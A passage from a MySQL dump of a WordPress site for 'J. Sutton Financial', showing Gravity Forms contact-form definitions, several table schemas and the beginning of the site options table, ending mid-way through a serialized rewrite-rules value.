{form_title}\",\"message\":\"{all_fields}\"}}'),(4,'{\"labelPlacement\":\"top_label\",\"useCurrentUserAsAuthor\":\"1\",\"postAuthor\":\"1\",\"postCategory\":\"1\",\"postStatus\":\"draft\",\"title\":\"TEST\",\"description\":\"\",\"maxEntriesAllowed\":\"0\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\",\"conditionalLogic\":null},\"fields\":[{\"type\":\"name\",\"id\":1,\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"We need to know your name. What if we wanted to send you a birthday cake?\",\"label\":\"Name\",\"inputs\":[{\"id\":\"1.2\",\"label\":\"Prefix\",\"name\":\"\",\"autocompleteAttribute\":\"honorific-prefix\",\"choices\":[{\"text\":\"Mr.\",\"value\":\"Mr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Miss\",\"value\":\"Miss\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Ms.\",\"value\":\"Ms.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Dr.\",\"value\":\"Dr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Prof.\",\"value\":\"Prof.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Rev.\",\"value\":\"Rev.\",\"isSelected\":false,\"price\":\"\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"1.3\",\"label\":\"First\",\"name\":\"\",\"placeholder\":\"\",\"autocompleteAttribute\":\"given-name\"},{\"id\":\"1.4\",\"label\":\"Middle\",\"name\":\"\",\"autocompleteAttribute\":\"additional-name\",\"isHidden\":true},{\"id\":\"1.6\",\"label\":\"Last\",\"name\":\"\",\"placeholder\":\"\",\"autocompleteAttribute\":\"family-name\"},{\"id\":\"1.8\",\"label\":\"Suffix\",\"name\":\"\",\"autocompleteAttribute\":\"honorific-suffix\",\"isHidden\":true}],\"inputType\":\"\",\"displayOnly\":\"\",\"nameFormat\":\"advanced\",\"choices\":\"\",\"conditionalLogic\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"allowsPrepopulate\":false,\"useRichTextEditor\":false,\"defaultValue\":\"\",\"description\":\"\",\"visibility\":\"visible\",\"fields\":\"\",\"layoutGroupId\":\"755102fe\",\"adminLabel\":\"\",\"inputMaskIsCustom\":\"\",\"maxLength\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"enableAutocomplete\":true,\"autocompleteAttribute\":\"\",\"pageNumber\":1,\"formId\":0},{\"type\":\"email\",\"id\":2,\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"please supply a valid email address\",\"label\":\"Email\",\"inputType\":\"\",\"displayOnly\":\"\",\"inputs\":[{\"id\":\"2\",\"label\":\"Enter Email\",\"name\":\"\",\"autocompleteAttribute\":\"email\"},{\"id\":\"2.2\",\"label\":\"Confirm Email\",\"name\":\"\",\"autocompleteAttribute\":\"email\"}],\"choices\":\"\",\"conditionalLogic\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"allowsPrepopulate\":false,\"useRichTextEditor\":false,\"visibility\":\"visible\",\"fields\":\"\",\"inputMaskIsCustom\":false,\"layoutGroupId\":\"17f293c9\",\"autocompleteAttribute\":\"\",\"emailConfirmEnabled\":true,\"adminLabel\":\"\",\"description\":\"\",\"maxLength\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":true,\"pageNumber\":1,\"formId\":0},{\"type\":\"textarea\",\"id\":3,\"isRequired\":true,\"size\":\"medium\",\"label\":\"Comments\",\"inputType\":\"\",\"displayOnly\":\"\",\"inputs\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"allowsPrepopulate\":false,\"useRichTextEditor\":false,\"visibility\":\"visible\",\"fields\":\"\",\"inputMaskIsCustom\":false,\"description\":\"Please let us know what&#039;s on your mind. Have a question for us? Ask away.\",\"defaultValue\":\"\",\"checkboxLabel\":\"\",\"maxLength\":600,\"layoutGroupId\":\"2de1220e\",\"adminLabel\":\"\",\"errorMessage\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"pageNumber\":1,\"formId\":0}],\"descriptionPlacement\":\"above\",\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"nextFieldId\":13,\"subLabelPlacement\":\"above\",\"cssClass\":\"\",\"enableHoneypot\":false,\"enableAnimation\":false,\"save\":{\"enabled\":false,\"button\":{\"type\":\"link\",\"text\":\"Save and Continue Later\"}},\"limitEntries\":false,\"limitEntriesCount\":\"\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":false,\"scheduleStart\":\"\",\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEnd\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":false,\"requireLoginMessage\":\"\",\"feeds\":{\"gravityformsadvancedpostcreation\":[]},\"version\":\"2.7.3\",\"validationSummary\":\"1\",\"requiredIndicator\":\"text\",\"customRequiredIndicator\":\"\",\"markupVersion\":2,\"autoResponder\":{\"toField\":\"2\",\"from\":\"{admin_email}\",\"subject\":\"Submission from {Name (First):1.3} - {Email:2}\",\"message\":\"Hi there {Name (First):1.3}. We received the following information from you and will respond to your inquiry as quickly as possible.{all_fields}\"},\"delete_entry\":\"\",\"delete_entry_condition\":\"\",\"delete_entry_period\":\"\",\"delete_entry_units\":\"hour\",\"template_id\":\"basic_contact\",\"id\":4}',NULL,'{\"5179518e5e160\":{\"type\":\"message\",\"id\":\"5179518e5e160\",\"isDefault\":true,\"message\":\"Thank you for contacting us! We will get in touch with you shortly.\",\"name\":\"Default Confirmation\",\"disableAutoformat\":false,\"pageId\":0,\"url\":\"\",\"queryString\":\"\",\"conditionalLogic\":[]}}','{\"51794abf1f0d1\":{\"id\":\"51794abf1f0d1\",\"from\":\"{admin_email}\",\"subject\":\"We have received your inquiry\",\"message\":\"<p>Hi there {Name (First):1.3},<\\/p><p>Thank you for getting in touch. We have received your inquiry and will get back to you within one business day.<\\/p>\",\"toType\":\"field\",\"toField\":\"2\",\"to\":\"2\",\"event\":\"form_submission\",\"name\":\"User Notification\",\"type\":\"user\"},\"51794abf1f0d2\":{\"id\":\"51794abf1f0d2\",\"from\":\"{admin_email}\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\",\"toType\":\"email\",\"to\":\"{admin_email}\",\"event\":\"form_submission\",\"name\":\"Admin Notification\"}}'),(5,'{\"labelPlacement\":\"top_label\",\"useCurrentUserAsAuthor\":\"1\",\"postAuthor\":\"1\",\"postCategory\":\"1\",\"postStatus\":\"draft\",\"title\":\"Request an Agent\",\"description\":\"\",\"maxEntriesAllowed\":\"0\",\"button\":{\"type\":\"text\",\"text\":\"Submit\",\"imageUrl\":\"\",\"conditionalLogic\":null,\"width\":\"auto\",\"location\":\"bottom\",\"layoutGridColumnSpan\":12,\"id\":\"submit\"},\"fields\":[{\"type\":\"name\",\"id\":1,\"isRequired\":true,\"size\":\"medium\",\"errorMessage\":\"We need to know your name. What if we wanted to send you a birthday cake?\",\"label\":\"Name\",\"inputs\":[{\"id\":\"1.2\",\"label\":\"Prefix\",\"name\":\"\",\"autocompleteAttribute\":\"honorific-prefix\",\"choices\":[{\"text\":\"Mr.\",\"value\":\"Mr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Mrs.\",\"value\":\"Mrs.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Miss\",\"value\":\"Miss\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Ms.\",\"value\":\"Ms.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Dr.\",\"value\":\"Dr.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Prof.\",\"value\":\"Prof.\",\"isSelected\":false,\"price\":\"\"},{\"text\":\"Rev.\",\"value\":\"Rev.\",\"isSelected\":false,\"price\":\"\"}],\"isHidden\":true,\"inputType\":\"radio\"},{\"id\":\"1.3\",\"label\":\"First\",\"name\":\"\",\"placeholder\":\"\",\"autocompleteAttribute\":\"given-name\"},{\"id\":\"1.4\",\"label\":\"Middle\",\"name\":\"\",\"autocompleteAttribute\":\"additional-name\",\"isHidden\":true},{\"id\":\"1.6\",\"label\":\"Last\",\"name\":\"\",\"placeholder\":\"\",\"autocompleteAttribute\":\"family-name\"},{\"id\":\"1.8\",\"label\":\"Suffix\",\"name\":\"\",\"autocompleteAttribute\":\"honorific-suffix\",\"isHidden\":true}],\"inputType\":\"\",\"displayOnly\":\"\",\"nameFormat\":\"advanced\",\"choices\":\"\",\"conditionalLogic\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"allowsPrepopulate\":false,\"useRichTextEditor\":false,\"defaultValue\":\"\",\"description\":\"\",\"visibility\":\"visible\",\"fields\":\"\",\"layoutGroupId\":\"755102fe\",\"adminLabel\":\"\",\"inputMaskIsCustom\":\"\",\"maxLength\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"enableAutocomplete\":true,\"autocompleteAttribute\":\"\",\"pageNumber\":1,\"formId\":5},{\"type\":\"email\",\"id\":2,\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"please supply a valid email address\",\"label\":\"Email\",\"inputType\":\"\",\"displayOnly\":\"\",\"inputs\":[{\"id\":\"2\",\"label\":\"Enter Email\",\"name\":\"\",\"autocompleteAttribute\":\"email\"},{\"id\":\"2.2\",\"label\":\"Confirm Email\",\"name\":\"\",\"autocompleteAttribute\":\"email\"}],\"choices\":\"\",\"conditionalLogic\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"allowsPrepopulate\":false,\"useRichTextEditor\":false,\"visibility\":\"visible\",\"fields\":\"\",\"inputMaskIsCustom\":false,\"layoutGroupId\":\"17f293c9\",\"autocompleteAttribute\":\"\",\"emailConfirmEnabled\":true,\"adminLabel\":\"\",\"description\":\"\",\"maxLength\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":true,\"pageNumber\":1,\"formId\":5},{\"type\":\"phone\",\"id\":5,\"formId\":5,\"label\":\"Phone\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"inputs\":null,\"phoneFormat\":\"international\",\"autocompleteAttribute\":\"tel\",\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"choices\":\"\",\"conditionalLogic\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"enableEnhancedUI\":0,\"layoutGroupId\":\"b2cb498a\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"fields\":\"\"},{\"type\":\"address\",\"id\":4,\"formId\":5,\"label\":\"Address\",\"adminLabel\":\"\",\"isRequired\":true,\"size\":\"large\",\"errorMessage\":\"\",\"visibility\":\"visible\",\"addressType\":\"us\",\"inputs\":[{\"id\":\"4.1\",\"label\":\"Street Address\",\"name\":\"\",\"autocompleteAttribute\":\"address-line1\"},{\"id\":\"4.2\",\"label\":\"Address Line 2\",\"name\":\"\",\"autocompleteAttribute\":\"address-line2\"},{\"id\":\"4.3\",\"label\":\"City\",\"name\":\"\",\"autocompleteAttribute\":\"address-level2\"},{\"id\":\"4.4\",\"label\":\"State \\/ Province\",\"name\":\"\",\"autocompleteAttribute\":\"address-level1\",\"isHidden\":false},{\"id\":\"4.5\",\"label\":\"ZIP \\/ Postal Code\",\"name\":\"\",\"autocompleteAttribute\":\"postal-code\"},{\"id\":\"4.6\",\"label\":\"Country\",\"name\":\"\",\"autocompleteAttribute\":\"country-name\",\"isHidden\":true}],\"description\":\"\",\"allowsPrepopulate\":false,\"inputMask\":false,\"inputMaskValue\":\"\",\"inputMaskIsCustom\":false,\"maxLength\":\"\",\"inputType\":\"\",\"labelPlacement\":\"\",\"descriptionPlacement\":\"\",\"subLabelPlacement\":\"\",\"placeholder\":\"\",\"cssClass\":\"\",\"inputName\":\"\",\"noDuplicates\":false,\"defaultValue\":\"\",\"enableAutocomplete\":false,\"autocompleteAttribute\":\"\",\"choices\":\"\",\"conditionalLogic\":\"\",\"defaultCountry\":\"United States\",\"defaultProvince\":\"\",\"copyValuesOptionLabel\":\"\",\"productField\":\"\",\"layoutGridColumnSpan\":12,\"defaultState\":\"\",\"enableCopyValuesOption\":\"\",\"copyValuesOptionDefault\":\"\",\"copyValuesOptionField\":\"\",\"enableEnhancedUI\":0,\"layoutGroupId\":\"3497ddc6\",\"multipleFiles\":false,\"maxFiles\":\"\",\"calculationFormula\":\"\",\"calculationRounding\":\"\",\"enableCalculation\":\"\",\"disableQuantity\":false,\"displayAllCategories\":false,\"useRichTextEditor\":false,\"pageNumber\":1,\"fields\":\"\"}],\"descriptionPlacement\":\"above\",\"postContentTemplateEnabled\":false,\"postTitleTemplateEnabled\":false,\"postTitleTemplate\":\"\",\"postContentTemplate\":\"\",\"lastPageButton\":null,\"pagination\":null,\"firstPageCssClass\":null,\"nextFieldId\":6,\"subLabelPlacement\":\"above\",\"cssClass\":\"\",\"enableHoneypot\":false,\"enableAnimation\":false,\"save\":{\"enabled\":false,\"button\":{\"type\":\"link\",\"text\":\"Save and Continue Later\"}},\"limitEntries\":false,\"limitEntriesCount\":\"\",\"limitEntriesPeriod\":\"\",\"limitEntriesMessage\":\"\",\"scheduleForm\":false,\"scheduleStart\":\"\",\"scheduleStartHour\":\"\",\"scheduleStartMinute\":\"\",\"scheduleStartAmpm\":\"\",\"scheduleEnd\":\"\",\"scheduleEndHour\":\"\",\"scheduleEndMinute\":\"\",\"scheduleEndAmpm\":\"\",\"schedulePendingMessage\":\"\",\"scheduleMessage\":\"\",\"requireLogin\":false,\"requireLoginMessage\":\"\",\"feeds\":{\"gravityformsadvancedpostcreation\":[]},\"version\":\"2.7.3\",\"validationSummary\":\"1\",\"requiredIndicator\":\"text\",\"customRequiredIndicator\":\"\",\"markupVersion\":2,\"autoResponder\":{\"from\":\"{admin_email}\",\"subject\":\"We have received your inquiry\",\"message\":\"<p>Hi there {Name (First):1.3},<\\/p><p>Thank you for getting in touch. We have received your inquiry and will get back to you within one business day.<\\/p>\",\"toField\":\"2\"},\"delete_entry\":\"\",\"delete_entry_condition\":\"\",\"delete_entry_period\":\"\",\"delete_entry_units\":\"hour\",\"template_id\":\"basic_contact\",\"id\":5}',NULL,'{\"5179518e5e160\":{\"type\":\"message\",\"id\":\"5179518e5e160\",\"isDefault\":true,\"message\":\"Thank you for contacting us! We will get in touch with you shortly.\",\"name\":\"Default Confirmation\",\"disableAutoformat\":false,\"pageId\":0,\"url\":\"\",\"queryString\":\"\",\"conditionalLogic\":[]}}','{\"51794abf1f0d2\":{\"id\":\"51794abf1f0d2\",\"from\":\"{admin_email}\",\"subject\":\"New submission from {form_title}\",\"message\":\"{all_fields}\",\"toType\":\"email\",\"to\":\"info@JSuttonFinacial.com\",\"event\":\"form_submission\",\"name\":\"Admin Notification\",\"service\":\"wordpress\",\"toEmail\":\"info@JSuttonFinacial.com\",\"toField\":\"\",\"routing\":null,\"fromName\":\"\",\"replyTo\":\"\",\"bcc\":\"\",\"disableAutoformat\":false,\"notification_conditional_logic_object\":\"\",\"notification_conditional_logic\":\"0\",\"conditionalLogic\":null,\"cc\":\"\",\"enableAttachments\":false}}');
/*!40000 ALTER TABLE `wpfi_gf_form_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_gf_form_revisions`
--

DROP TABLE IF EXISTS `wpfi_gf_form_revisions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_gf_form_revisions` (
  `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` mediumint(10) unsigned NOT NULL,
  `display_meta` longtext DEFAULT NULL,
  `date_created` datetime NOT NULL,
  PRIMARY KEY (`id`),
  KEY `date_created` (`date_created`),
  KEY `form_id` (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_gf_form_revisions`
--

LOCK TABLES `wpfi_gf_form_revisions` WRITE;
/*!40000 ALTER TABLE `wpfi_gf_form_revisions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_gf_form_revisions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_gf_form_view`
--

DROP TABLE IF EXISTS `wpfi_gf_form_view`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_gf_form_view` (
  `id` bigint(10) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` mediumint(10) unsigned NOT NULL,
  `date_created` datetime NOT NULL,
  `ip` char(15) DEFAULT NULL,
  `count` mediumint(10) unsigned NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `date_created` (`date_created`),
  KEY `form_id` (`form_id`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_gf_form_view`
--

LOCK TABLES `wpfi_gf_form_view` WRITE;
/*!40000 ALTER TABLE `wpfi_gf_form_view` DISABLE KEYS */;
INSERT INTO `wpfi_gf_form_view` VALUES (1,1,'2023-03-15 12:20:27','',1),(2,1,'2023-04-04 14:10:34','',31),(3,2,'2023-04-04 21:15:46','',2),(4,1,'2023-04-08 20:58:39','',39),(5,2,'2023-04-08 21:02:22','',11),(6,1,'2023-04-10 19:49:52','',40),(7,5,'2023-04-10 23:50:03','',6),(8,2,'2023-04-11 15:37:58','',10),(9,1,'2023-04-11 20:20:06','',43),(10,1,'2023-04-19 15:45:50','',11);
/*!40000 ALTER TABLE `wpfi_gf_form_view` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_gf_rest_api_keys`
--

DROP TABLE IF EXISTS `wpfi_gf_rest_api_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_gf_rest_api_keys` (
  `key_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `description` varchar(200) DEFAULT NULL,
  `permissions` varchar(10) NOT NULL,
  `consumer_key` char(64) NOT NULL,
  `consumer_secret` char(43) NOT NULL,
  `nonces` longtext DEFAULT NULL,
  `truncated_key` char(7) NOT NULL,
  `last_access` datetime DEFAULT NULL,
  PRIMARY KEY (`key_id`),
  KEY `consumer_key` (`consumer_key`),
  KEY `consumer_secret` (`consumer_secret`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_gf_rest_api_keys`
--

LOCK TABLES `wpfi_gf_rest_api_keys` WRITE;
/*!40000 ALTER TABLE `wpfi_gf_rest_api_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_gf_rest_api_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_links`
--

DROP TABLE IF EXISTS `wpfi_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_links`
--

LOCK TABLES `wpfi_links` WRITE;
/*!40000 ALTER TABLE `wpfi_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpfi_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpfi_options`
--

DROP TABLE IF EXISTS `wpfi_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpfi_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=MyISAM AUTO_INCREMENT=19120 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpfi_options`
--

LOCK TABLES `wpfi_options` WRITE;
/*!40000 ALTER TABLE `wpfi_options` DISABLE KEYS */;
INSERT INTO `wpfi_options` VALUES (1,'siteurl','http://cmdev-site1.com','yes'),(2,'home','http://cmdev-site1.com','yes'),(3,'blogname','J. Sutton Financial','yes'),(4,'blogdescription','Planning for a better financial future','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','terra@smcorridornews.com','yes'),(7,'start_of_week','0','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','F j, Y','yes'),(24,'time_format','g:i A','yes'),(25,'links_updated_date_format','F j, Y g:i a','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(29,'rewrite_rules','a:328:{s:10:\"project/?$\";s:27:\"index.php?post_type=project\";s:40:\"project/feed/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=project&feed=$matches[1]\";s:35:\"project/(feed|rdf|rss|rss2|atom)/?$\";s:44:\"index.php?post_type=project&feed=$matches[1]\";s:27:\"project/page/([0-9]{1,})/?$\";s:45:\"index.php?post_type=project&paged=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:16:\"custom-css-js/?$\";s:33:\"index.php?post_type=custom-css-js\";s:46:\"custom-css-js/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_type=custom-css-js&feed=$matches[1]\";s:41:\"custom-css-js/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_type=custom-css-js&feed=$matches[1]\";s:33:\"custom-css-js/page/([0-9]{1,})/?$\";s:51:\"index.php?post_type=custom-css-js&paged=$matches[1]\";s:43:\"^pdf/([A-Za-z0-9]+)/([0-9]+)/?(download)?/?\";s:67:\"index.php?gpdf=1&pid=$matches[1]&lid=$matches[2]&action=$matches[3]\";s:53:\"^index.php/pdf/([A-Za-z0-9]+)/([0-9]+)/?(download)?/?\";s:67:\"index.php?gpdf=1&pid=$matches[1]&lid=$matches[2]&action=$matches[3]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:56:\"layout_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:68:\"index.php?taxonomy=layout_category&term=$matches[1]&feed=$matches[2]\";s:51:\"layout_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:68:\"index.php?taxonomy=layout_category&term=$matches[1]&feed=$matches[2]\";s:32:\"layout_category/([^/]+)/embed/?$\";s:62:\"index.php?taxonomy=layout_category&term=$matches[1]&embed=true\";s:44:\"layout_category/([^/]+)/page/?([0-9]{1,})/?$\";s:69:\"index.php?taxonomy=layout_category&term=$m